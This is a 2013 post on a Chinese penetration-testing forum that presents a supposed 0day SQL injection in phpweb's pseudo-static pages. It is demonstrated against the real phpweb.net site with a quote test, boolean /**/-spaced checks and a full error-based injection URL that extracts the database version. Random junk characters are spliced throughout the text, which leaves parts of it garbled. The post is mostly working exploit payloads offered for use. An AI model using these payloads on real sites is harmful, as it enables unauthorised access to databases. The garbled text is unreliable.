找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
返回列表 发新帖
查看: 3066|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
" B+ H& i" k, z' ~/ U# C; a
  @* U0 ?$ v, _% f$ i主站:http://phpweb.net/3 {  b( u7 B7 [7 @2 i
加’检测:% `0 [' \7 A& f! I2 j# P

# N9 h3 [! p* b/ a$ Lhttp://www.phpweb.net/down/html/?772′.html+ f$ k7 {7 G/ ^- D" c) k+ ~

, ~# n+ U7 K' u9 s) A% e出错
- {- B7 B9 a1 F$ W& W存在注入。
) K& D& e8 S4 _) f2 C0 w8 W不能用空格,只能用/*罗5 p+ r9 d$ L1 Q
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常# j2 I1 u* s9 h0 Y  {

) K/ T3 F8 K/ C* m+ v) Qhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错., I9 T& ?7 A2 [% a. Y! t6 ^) W4 R
爆数据库版本:
5 @* B5 K6 t( K  G9 A& E5 C
; C/ b9 U' Z. v! E) r. H9 Y% q?: b5 E* `/ S' e' u
1- r$ c  [- |; T/ j4 m& A5 ~2 w- ^
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html4 A- ?  R& P- v1 V
更新日期: 2013-01-03 13:39:50        ( M) a) E' e' f, \3 c
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表